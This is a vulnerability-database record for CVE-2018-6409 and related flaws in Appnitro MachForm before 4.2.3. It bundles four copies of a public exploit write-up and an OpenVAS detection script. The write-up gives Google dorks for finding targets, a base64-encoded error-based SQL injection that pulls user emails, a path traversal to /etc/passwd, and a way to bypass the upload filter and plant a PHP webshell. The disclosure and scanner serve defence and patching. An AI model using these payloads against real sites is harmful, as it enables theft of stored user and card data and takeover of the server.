ID CVE-2018-6409 Type cve Reporter cve@mitre.org Modified 2018-06-29T17:47:00
Description
An issue was discovered in Appnitro MachForm before 4.2.3. The module in charge of serving stored files gets the path from the database. Modifying the name of the file to serve on the corresponding ap_form table leads to a path traversal vulnerability via the download.php q parameter.
{"packetstorm": [{"lastseen": "2018-05-31T09:29:47", "description": "", "published": "2018-05-28T00:00:00", "type": "packetstorm", "title": "Appnitro MachForm SQL Injection / Traversal / File Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-6409", "CVE-2018-6410", "CVE-2018-6411"], "modified": "2018-05-28T00:00:00", "id": "PACKETSTORM:147948", "href": "https://packetstormsecurity.com/files/147948/Appnitro-MachForm-SQL-Injection-Traversal-File-Upload.html", "sourceData": "`Vendor: Appnitro \nProduct webpage: https://www.machform.com/ \nFull-Disclose: https://metalamin.github.io/MachForm-not-0-day-EN/ \nFix: https://www.machform.com/blog-machform-423-security-release/ \n \nAuthor: Amine Taouirsa \n@metalamin \n \nGoogle dork examples: \n---------------------- \n\"machform\" inurl:\"view.php\" \n\"machform\" inurl:\"embed.php\" \n \nSummary: \n--------- \nThe form creation platform MachForm from Appnitro is subject to SQL \ninjections that lead to path traversal and arbitrary file upload. \n \nThe application is widely deployed and with some google dorks it\u2019s possible \nto find various webpages storing sensitive data as credit card numbers with \ncorresponding security codes. Also, the arbitrary file upload can let an \nattacker get control of the server by uploading a WebShell. \n \n[1] SQL injection (CVE-2018-6410): \n------------------------- \n \n[1.1] Description: \nThe software is subject to SQL injections in the \u2018download.php\u2019 file. \n \n[1.2] Parameters and statement: \nThis SQLi can be found on the parameter \u2018q\u2019 which is a base64 encoded value \nfor the following parameters: \n \n$form_id = $params['form_id']; \n$id = $params['id']; \n$field_name = $params['el']; \n$file_hash = $params['hash']; \n \n \nSo the injectable parameters are \u2018el\u2019 and \u2018form_id\u2019 obtaining error-based, \nstacked queries and time-based blind SQL injections. 
This is due to the \nfollowing vulnerable statement: \n \n$query = \"select {$field_name} from `\".MF_TABLE_PREFIX.\"form_{$form_id}` \nwhere id=?\"; \n \n \n[1.3] POC \nProof of concept to get the first user mail: \nhttp:// [URL] / [Machform_folder] \n/download.php?q=ZWw9IChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHgyMDIwLChTRUxFQ1QgTUlEKCh1c2VyX2VtYWlsKSwxLDUwKSBGUk9NIGFwX3VzZXJzIE9SREVSIEJZIHVzZXJfaWQgTElNSVQgMCwxKSwweDIwMjAsRkxPT1IoUkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLkNIQVJBQ1RFUl9TRVRTIEdST1VQIEJZIHgpYSkgOyZpZD0xJmhhc2g9MSZmb3JtX2lkPTE= \n \nWhich is the base64 encoding for: \nel= (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x2020,(SELECT \nMID((user_email),1,50) FROM ap_users ORDER BY user_id LIMIT \n0,1),0x2020,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP \nBY x)a) ;&id=1&hash=1&form_id=1 \n \n \n[2] Path traversal (CVE-2018-6409): \n----------------------------------- \n \n[2.1] Description \n\u2018download.php\u2019 is used to serve stored files from the forms answers. \nModifying the name of the file to serve on the corresponding ap_form table \nleads to a path traversal vulnerability. 
\n \n[2.2] POC \nFirst we need to change the name for the element on the form: \nupdate ap_form_58009 set \nelement_4=\"../../../../../../../../../../../../../../../../etc/passwd\" \nwhere id=1; \n \nNow in order to be able to download it, we need to access: \nhttp:// [URL] / [Machform_folder] \n/download.php?q=ZWw9NCZpZD0xJmhhc2g9NDAyYmEwMjMwZDZmNDRhMmRlNTkwYWMxMTEwN2E0NTgmZm9ybV9pZD01ODAwOQo= \n \nWhich is the base64 encoding for; \nel=4&id=1&hash=402ba0230d6f44a2de590ac11107a458&form_id=58009 \n \nNote that hash is the MD5 of the corresponding filename: \nmd5(\"../../../../../../../../../../../../../../../../etc/passwd\") = \n402ba0230d6f44a2de590ac11107a458 \n \n[3] Bypass file upload filter (CVE-2018-6411): \n---------------------------------------------- \n \nWhen the form is set to filter a blacklist, it automatically add dangerous \nextensions to the filters. \nIf the filter is set to a whitelist, the dangerous extensions can be \nbypassed. \n \nThis can be done directly on the database via SQLi \nupdate ap_form_elements set \nelement_file_type_list=\"php\",element_file_block_or_allow=\"a\" where \nform_id=58009 and element_id=4; \n \nOnce uploaded the file can be found and executed in the following URL: \nhttp:// [URL] / [Machform_folder] /data/form_58009/files/ [filename] \n \nThe filename can be found in the database \nSELECT element_4 FROM ap_form_58009 WHERE id=1; \n \n-- \n \nAmine Taouirsa \n \nHacking | Head of Hacking Research \n \namine_taouirsa@innotecsystem.com \n \nT. +34 917 281 504 | M. +34 644 486 240 \n \nAvda. Llano Castellano, 43 28034 MADRID \n \n \n<http://www.innotecsystem.com/> \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/147948/appnitromachform-sqlshelltraversal.txt"}], "exploitdb": [{"lastseen": "2018-05-30T18:08:05", "description": "MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload Bypass. CVE-2018-6409,CVE-2018-6410,CVE-2018-6411. 
Webapps exploit for PHP platform. Tags: SQL ...", "published": "2018-05-30T00:00:00", "type": "exploitdb", "title": "MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-6409", "CVE-2018-6410", "CVE-2018-6411"], "modified": "2018-05-30T00:00:00", "id": "EDB-ID:44804", "href": "https://www.exploit-db.com/exploits/44804/", "sourceData": "Vendor: Appnitro\r\nProduct webpage: https://www.machform.com/\r\nFull-Disclose: https://metalamin.github.io/MachForm-not-0-day-EN/\r\nFix: https://www.machform.com/blog-machform-423-security-release/\r\n\r\nAuthor: Amine Taouirsa\r\nTwitter: @metalamin\r\n\r\nGoogle dork examples:\r\n----------------------\r\n\"machform\" inurl:\"view.php\"\r\n\"machform\" inurl:\"embed.php\"\r\n\r\nSummary:\r\n---------\r\nThe form creation platform MachForm from Appnitro is subject to SQL\r\ninjections that lead to path traversal and arbitrary file upload.\r\n\r\nThe application is widely deployed and with some google dorks it\u2019s possible\r\nto find various webpages storing sensitive data as credit card numbers with\r\ncorresponding security codes. Also, the arbitrary file upload can let an\r\nattacker get control of the server by uploading a WebShell.\r\n\r\n[1] SQL injection (CVE-2018-6410):\r\n-------------------------\r\n\r\n[1.1] Description:\r\nThe software is subject to SQL injections in the \u2018download.php\u2019 file.\r\n\r\n[1.2] Parameters and statement:\r\nThis SQLi can be found on the parameter \u2018q\u2019 which a base64 encoded value\r\nfor the following parameters:\r\n\r\n $form_id = $params['form_id'];\r\n $id = $params['id'];\r\n $field_name = $params['el'];\r\n $file_hash = $params['hash'];\r\n\r\n\r\nSo the injectable parameters are \u2018el\u2019 and \u2018form_id\u2019 obtaining error-based,\r\nstacked queries and time-based blind SQL injections. 
This is due to the\r\nfollowing vulnerable statement:\r\n\r\n $query = \"select {$field_name} from `\".MF_TABLE_PREFIX.\"form_{$form_id}`\r\nwhere id=?\";\r\n\r\n\r\n[1.3] POC\r\nProof of concept to get the first user mail:\r\n http:// [URL] / [Machform_folder] /download.php?q=\r\nZWw9IChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHgy\r\nMDIwLChTRUxFQ1QgTUlEKCh1c2VyX2VtYWlsKSwxLDUwKSBGUk9NIGFwX3Vz\r\nZXJzIE9SREVSIEJZIHVzZXJfaWQgTElNSVQgMCwxKSwweDIwMjAsRkxPT1Io\r\nUkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLkNIQVJBQ1RF\r\nUl9TRVRTIEdST1VQIEJZIHgpYSkgOyZpZD0xJmhhc2g9MSZmb3JtX2lkPTE=\r\n\r\nWhich is the base64 encoding for:\r\n el= (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x2020,(SELECT\r\nMID((user_email),1,50) FROM ap_users ORDER BY user_id LIMIT\r\n0,1),0x2020,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP\r\nBY x)a) ;&id=1&hash=1&form_id=1\r\n\r\n\r\n[2] Path traversal (CVE-2018-6409):\r\n-----------------------------------\r\n\r\n[2.1] Descrition\r\ndownload.php\u2019 is used to serve stored files from the forms answers.\r\nModifying the name of the file to serve on the corresponding ap_form table\r\nleads to a path traversal vulnerability.\r\n\r\n[2.2] POC\r\nFirst we need to change the name for the element on the form:\r\nupdate ap_form_58009 set element_4=\"../../../../../../.\r\n./../../../../../../../../../etc/passwd\" where id=1;\r\n\r\nNow in order to be able to download it, we need to access:\r\n http:// [URL] / [Machform_folder] /download.php?q=\r\nZWw9NCZpZD0xJmhhc2g9NDAyYmEwMjMwZDZmNDRhMmRlNTkwYWMxMTEwN2E0\r\nNTgmZm9ybV9pZD01ODAwOQo=\r\n\r\nWhich is the base64 encoding for;\r\n el=4&id=1&hash=402ba0230d6f44a2de590ac11107a458&form_id=58009\r\n\r\nNote that hash is the MD5 of the corresponding filename:\r\n md5(\"../../../../../../../../../../../../../../../../etc/passwd\") =\r\n402ba0230d6f44a2de590ac11107a458\r\n\r\n[3] Bypass file upload filter (CVE-2018-6411):\r\n----------------------------------------------\r\n\r\nWhen the 
form is set to filter a blacklist, it automatically add dangerous\r\nextensions to the filters.\r\nIf the filter is set to a whitelist, the dangerous extensions can be\r\nbypassed.\r\n\r\nThis can be done directly on the database via SQLi\r\nupdate ap_form_elements set element_file_type_list=\"php\",\r\nelement_file_block_or_allow=\"a\" where form_id=58009 and element_id=4;\r\n\r\nOnce uploaded the file can be found and executed in the following URL:\r\nhttp:// [URL] / [Machform_folder] /data/form_58009/files/ [filename]\r\n\r\nThe filename can be found in the database\r\nSELECT element_4 FROM ap_form_58009 WHERE id=1;", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44804/"}], "zdt": [{"lastseen": "2018-05-31T01:51:33", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2018-05-30T00:00:00", "title": "MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload Bypass Vulnerabilities", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-6409", "CVE-2018-6410", "CVE-2018-6411"], "modified": "2018-05-30T00:00:00", "id": "1337DAY-ID-30504", "href": "https://0day.today/exploit/description/30504", "sourceData": "Vendor: Appnitro\r\nProduct webpage: https://www.machform.com/\r\nFull-Disclose: https://metalamin.github.io/MachForm-not-0-day-EN/\r\nFix: https://www.machform.com/blog-machform-423-security-release/\r\n \r\nAuthor: Amine Taouirsa\r\nTwitter: @metalamin\r\n \r\nGoogle dork examples:\r\n----------------------\r\n\"machform\" inurl:\"view.php\"\r\n\"machform\" inurl:\"embed.php\"\r\n \r\nSummary:\r\n---------\r\nThe form creation platform MachForm from Appnitro is subject to SQL\r\ninjections that lead to path traversal and arbitrary file upload.\r\n \r\nThe application is widely deployed and with some google dorks it\u2019s possible\r\nto find various webpages storing sensitive data as credit card numbers with\r\ncorresponding security codes. 
Also, the arbitrary file upload can let an\r\nattacker get control of the server by uploading a WebShell.\r\n \r\n[1] SQL injection (CVE-2018-6410):\r\n-------------------------\r\n \r\n[1.1] Description:\r\nThe software is subject to SQL injections in the \u2018download.php\u2019 file.\r\n \r\n[1.2] Parameters and statement:\r\nThis SQLi can be found on the parameter \u2018q\u2019 which a base64 encoded value\r\nfor the following parameters:\r\n \r\n $form_id = $params['form_id'];\r\n $id = $params['id'];\r\n $field_name = $params['el'];\r\n $file_hash = $params['hash'];\r\n \r\n \r\nSo the injectable parameters are \u2018el\u2019 and \u2018form_id\u2019 obtaining error-based,\r\nstacked queries and time-based blind SQL injections. This is due to the\r\nfollowing vulnerable statement:\r\n \r\n $query = \"select {$field_name} from `\".MF_TABLE_PREFIX.\"form_{$form_id}`\r\nwhere id=?\";\r\n \r\n \r\n[1.3] POC\r\nProof of concept to get the first user mail:\r\n http:// [URL] / [Machform_folder] /download.php?q=\r\nZWw9IChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHgy\r\nMDIwLChTRUxFQ1QgTUlEKCh1c2VyX2VtYWlsKSwxLDUwKSBGUk9NIGFwX3Vz\r\nZXJzIE9SREVSIEJZIHVzZXJfaWQgTElNSVQgMCwxKSwweDIwMjAsRkxPT1Io\r\nUkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLkNIQVJBQ1RF\r\nUl9TRVRTIEdST1VQIEJZIHgpYSkgOyZpZD0xJmhhc2g9MSZmb3JtX2lkPTE=\r\n \r\nWhich is the base64 encoding for:\r\n el= (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x2020,(SELECT\r\nMID((user_email),1,50) FROM ap_users ORDER BY user_id LIMIT\r\n0,1),0x2020,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP\r\nBY x)a) ;&id=1&hash=1&form_id=1\r\n \r\n \r\n[2] Path traversal (CVE-2018-6409):\r\n-----------------------------------\r\n \r\n[2.1] Descrition\r\ndownload.php\u2019 is used to serve stored files from the forms answers.\r\nModifying the name of the file to serve on the corresponding ap_form table\r\nleads to a path traversal vulnerability.\r\n \r\n[2.2] POC\r\nFirst we need to change the name for the 
element on the form:\r\nupdate ap_form_58009 set element_4=\"../../../../../../.\r\n./../../../../../../../../../etc/passwd\" where id=1;\r\n \r\nNow in order to be able to download it, we need to access:\r\n http:// [URL] / [Machform_folder] /download.php?q=\r\nZWw9NCZpZD0xJmhhc2g9NDAyYmEwMjMwZDZmNDRhMmRlNTkwYWMxMTEwN2E0\r\nNTgmZm9ybV9pZD01ODAwOQo=\r\n \r\nWhich is the base64 encoding for;\r\n el=4&id=1&hash=402ba0230d6f44a2de590ac11107a458&form_id=58009\r\n \r\nNote that hash is the MD5 of the corresponding filename:\r\n md5(\"../../../../../../../../../../../../../../../../etc/passwd\") =\r\n402ba0230d6f44a2de590ac11107a458\r\n \r\n[3] Bypass file upload filter (CVE-2018-6411):\r\n----------------------------------------------\r\n \r\nWhen the form is set to filter a blacklist, it automatically add dangerous\r\nextensions to the filters.\r\nIf the filter is set to a whitelist, the dangerous extensions can be\r\nbypassed.\r\n \r\nThis can be done directly on the database via SQLi\r\nupdate ap_form_elements set element_file_type_list=\"php\",\r\nelement_file_block_or_allow=\"a\" where form_id=58009 and element_id=4;\r\n \r\nOnce uploaded the file can be found and executed in the following URL:\r\nhttp:// [URL] / [Machform_folder] /data/form_58009/files/ [filename]\r\n \r\nThe filename can be found in the database\r\nSELECT element_4 FROM ap_form_58009 WHERE id=1;\n\n# 0day.today [2018-05-31] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30504"}], "openvas": [{"lastseen": "2019-05-29T18:32:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-6409", "CVE-2018-6410", "CVE-2018-6411"], "description": "Appnitro MachForm is prone to multiple vulnerabilities.", "modified": "2018-11-16T00:00:00", "published": "2018-05-31T00:00:00", "id": "OPENVAS:1361412562310141126", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141126", "type": "openvas", "title": "Appnitro MachForm < 4.2.3 Multiple Vulnerabilities", 
"sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_machform_mult_vuln.nasl 12368 2018-11-16 03:53:29Z ckuersteiner $\n#\n# Appnitro MachForm < 4.2.3 Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:appnitro:machform\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141126\");\n script_version(\"$Revision: 12368 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 04:53:29 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-31 09:43:14 +0700 (Thu, 31 May 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2018-6409\", \"CVE-2018-6410\", \"CVE-2018-6411\");\n\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Appnitro MachForm < 4.2.3 Multiple Vulnerabilities\");\n\n script_category(ACT_ATTACK);\n\n 
script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_appnitro_machform_detect.nasl\");\n script_mandatory_keys(\"appnitro_machform/installed\");\n\n script_tag(name:\"summary\", value:\"Appnitro MachForm is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"insight\", value:\"Appnitro MachForm is prone to multiple vulnerabilities:\n\n - Path traversal (CVE-2018-6409)\n\n - SQL-Injection (CVE-2018-6410)\n\n - Bypass of file upload filter (CVE-2018-6411)\");\n\n script_tag(name:\"vuldetect\", value:\"Tries to upload a PHP file and checks if phpinfo() can be exectuted.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.2.3 or later\");\n\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/44794/\");\n script_xref(name:\"URL\", value:\"https://metalamin.github.io/MachForm-not-0-day-EN/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nurl = dir + '/download.php?q=ZWw9IChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHgyMDIwLChTRUxFQ1QgTUlEKCh1c2VyX2VtYWlsKSwxLDUwKSBGUk9NIGFwX3VzZXJzIE9SREVSIEJZIHVzZXJfaWQgTElNSVQgMCwxKSwweDIwMjAsRkxPT1IoUkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLkNIQVJBQ1RFUl9TRVRTIEdST1VQIEJZIHgpYSkgOyZpZD0xJmhhc2g9MSZmb3JtX2lkPTE=';\n\nreq = http_get(port: port, item: url);\nres = http_keepalive_send_recv(port: port, data: req, bodyonly: TRUE);\n\nif (\"Integrity constraint violation\" >< res) {\n report = 'The error message retrieved indicates that an SQL Injection was possible.\\n\\nResponse:\\n' +\n res;\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": 
"2020-04-01T19:04:29", "description": "\nMachForm 4.2.3 - SQL Injection Path Traversal Upload Bypass", "edition": 1, "published": "2018-05-30T00:00:00", "title": "MachForm 4.2.3 - SQL Injection Path Traversal Upload Bypass", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-6409", "CVE-2018-6410", "CVE-2018-6411"], "modified": "2018-05-30T00:00:00", "id": "EXPLOITPACK:269096FC77F894EFD61D82DDB94BF254", "href": "", "sourceData": "Vendor: Appnitro\nProduct webpage: https://www.machform.com/\nFull-Disclose: https://metalamin.github.io/MachForm-not-0-day-EN/\nFix: https://www.machform.com/blog-machform-423-security-release/\n\nAuthor: Amine Taouirsa\nTwitter: @metalamin\n\nGoogle dork examples:\n----------------------\n\"machform\" inurl:\"view.php\"\n\"machform\" inurl:\"embed.php\"\n\nSummary:\n---------\nThe form creation platform MachForm from Appnitro is subject to SQL\ninjections that lead to path traversal and arbitrary file upload.\n\nThe application is widely deployed and with some google dorks it\u2019s possible\nto find various webpages storing sensitive data as credit card numbers with\ncorresponding security codes. Also, the arbitrary file upload can let an\nattacker get control of the server by uploading a WebShell.\n\n[1] SQL injection (CVE-2018-6410):\n-------------------------\n\n[1.1] Description:\nThe software is subject to SQL injections in the \u2018download.php\u2019 file.\n\n[1.2] Parameters and statement:\nThis SQLi can be found on the parameter \u2018q\u2019 which a base64 encoded value\nfor the following parameters:\n\n $form_id = $params['form_id'];\n $id = $params['id'];\n $field_name = $params['el'];\n $file_hash = $params['hash'];\n\n\nSo the injectable parameters are \u2018el\u2019 and \u2018form_id\u2019 obtaining error-based,\nstacked queries and time-based blind SQL injections. 
This is due to the\nfollowing vulnerable statement:\n\n $query = \"select {$field_name} from `\".MF_TABLE_PREFIX.\"form_{$form_id}`\nwhere id=?\";\n\n\n[1.3] POC\nProof of concept to get the first user mail:\n http:// [URL] / [Machform_folder] /download.php?q=\nZWw9IChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHgy\nMDIwLChTRUxFQ1QgTUlEKCh1c2VyX2VtYWlsKSwxLDUwKSBGUk9NIGFwX3Vz\nZXJzIE9SREVSIEJZIHVzZXJfaWQgTElNSVQgMCwxKSwweDIwMjAsRkxPT1Io\nUkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLkNIQVJBQ1RF\nUl9TRVRTIEdST1VQIEJZIHgpYSkgOyZpZD0xJmhhc2g9MSZmb3JtX2lkPTE=\n\nWhich is the base64 encoding for:\n el= (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x2020,(SELECT\nMID((user_email),1,50) FROM ap_users ORDER BY user_id LIMIT\n0,1),0x2020,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP\nBY x)a) ;&id=1&hash=1&form_id=1\n\n\n[2] Path traversal (CVE-2018-6409):\n-----------------------------------\n\n[2.1] Descrition\ndownload.php\u2019 is used to serve stored files from the forms answers.\nModifying the name of the file to serve on the corresponding ap_form table\nleads to a path traversal vulnerability.\n\n[2.2] POC\nFirst we need to change the name for the element on the form:\nupdate ap_form_58009 set element_4=\"../../../../../../.\n./../../../../../../../../../etc/passwd\" where id=1;\n\nNow in order to be able to download it, we need to access:\n http:// [URL] / [Machform_folder] /download.php?q=\nZWw9NCZpZD0xJmhhc2g9NDAyYmEwMjMwZDZmNDRhMmRlNTkwYWMxMTEwN2E0\nNTgmZm9ybV9pZD01ODAwOQo=\n\nWhich is the base64 encoding for;\n el=4&id=1&hash=402ba0230d6f44a2de590ac11107a458&form_id=58009\n\nNote that hash is the MD5 of the corresponding filename:\n md5(\"../../../../../../../../../../../../../../../../etc/passwd\") =\n402ba0230d6f44a2de590ac11107a458\n\n[3] Bypass file upload filter (CVE-2018-6411):\n----------------------------------------------\n\nWhen the form is set to filter a blacklist, it automatically add dangerous\nextensions to the filters.\nIf the 
filter is set to a whitelist, the dangerous extensions can be\nbypassed.\n\nThis can be done directly on the database via SQLi\nupdate ap_form_elements set element_file_type_list=\"php\",\nelement_file_block_or_allow=\"a\" where form_id=58009 and element_id=4;\n\nOnce uploaded the file can be found and executed in the following URL:\nhttp:// [URL] / [Machform_folder] /data/form_58009/files/ [filename]\n\nThe filename can be found in the database\nSELECT element_4 FROM ap_form_58009 WHERE id=1;", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}